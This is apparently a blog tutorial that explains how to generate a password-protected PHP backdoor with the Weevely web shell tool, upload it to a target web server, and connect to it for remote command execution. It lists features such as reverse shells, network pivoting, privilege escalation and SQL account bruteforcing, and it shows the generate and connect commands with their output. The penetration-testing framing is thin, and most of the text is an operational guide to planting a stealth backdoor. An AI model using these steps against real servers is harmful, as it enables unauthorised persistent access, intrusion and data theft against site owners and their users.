How to Create PHP Web Shell And Backdoor using Weevely

Weevely

Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at run time.

Upload weevely PHP agent to a target web server to get remote shell access to it via a small footprint PHP agent. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.

Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. It is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Features

  • Shell access to the target
  • SQL console pivoting on the target
  • HTTP/HTTPS proxy to browse through the target
  • Upload and download files
  • Spawn reverse and direct TCP shells
  • Audit remote target security
  • Run Meterpreter payloads
  • Port scan pivoting on target
  • Mount the remote filesystem
  • Bruteforce SQL accounts pivoting on the target

Download Weevely

Download the Git file:

Download via your browser:

Download via wget (in your terminal):

Generate the backdoor agent

Weevely client communicates to the PHP agent installed into the target. Move to the weevely3/ folder and run ./weevely.py to print help or just simply type weevely in your terminal.

[email protected]:~# weevely

[+] weevely 3.2.0
[!] Error: too few arguments

[+] Run terminal to the target
    weevely <URL> <password> [cmd]

[+] Load session file
    weevely session <path> [cmd]

[+] Generate backdoor agent
    weevely generate <password> <path>

To generate a new agent, just use the generate option passing the password and path arguments.

[email protected]:~# weevely generate 123 /root/Desktop/backdoor.php
Generated backdoor with password '123' in '/root/Desktop/backdoor.php' of 1476 byte size.

Then, upload the generated agent under the target web folder. Make sure that the agent PHP script is properly exposed and executable through the web server.

Connect to the agent

Launch weevely script to connect to the remote agent.

[email protected]:~# weevely http://localhost/backdoor.php 123
weevely>

The first prompt weevely> is still not connected to allow users to set any useful pre-connection option e.g. set proxies to be used. Running a real command starts automatically the session on the remote target.

weevely> uname -a
Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-2kali1 (2020-06-10) x86_64 GNU/Linux

Related Post

Leave a Reply

Your email address will not be published. Required fields are marked *